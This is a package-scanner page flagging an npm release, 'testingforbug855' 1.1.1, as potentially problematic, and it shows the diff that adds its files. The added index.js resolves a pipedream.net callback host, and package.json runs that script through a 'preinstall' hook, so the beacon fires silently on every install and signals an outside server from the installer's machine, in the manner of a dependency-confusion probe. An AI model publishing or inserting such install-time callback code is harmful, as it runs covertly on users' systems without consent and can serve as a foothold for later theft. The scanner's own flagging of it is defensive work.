testingforbug855 1.1.1

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of testingforbug855 might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +12 -0
  2. package/package.json +1 -0
package/index.js ADDED
@@ -0,0 +1,12 @@
1
+ const dns = require("dns");
2
+
3
+ const hostname = "eoe503u0wvmtxxl.m.pipedream.net";
4
+
5
+ dns.lookup(hostname, (err, address) => {
6
+ if (err) {
7
+ throw err;
8
+ } else {
9
+ // Do something with the address, e.g. send a request to the server
10
+ }
11
+ });
12
+
package/package.json ADDED
@@ -0,0 +1 @@
1
+ {"name":"testingforbug855","version":"1.1.1","description":"test","main":"index.js","scripts":{"test":"echo \"Error: no test specified\" && exit 1","preinstall":"node index.js"},"author":"","license":"ISC"}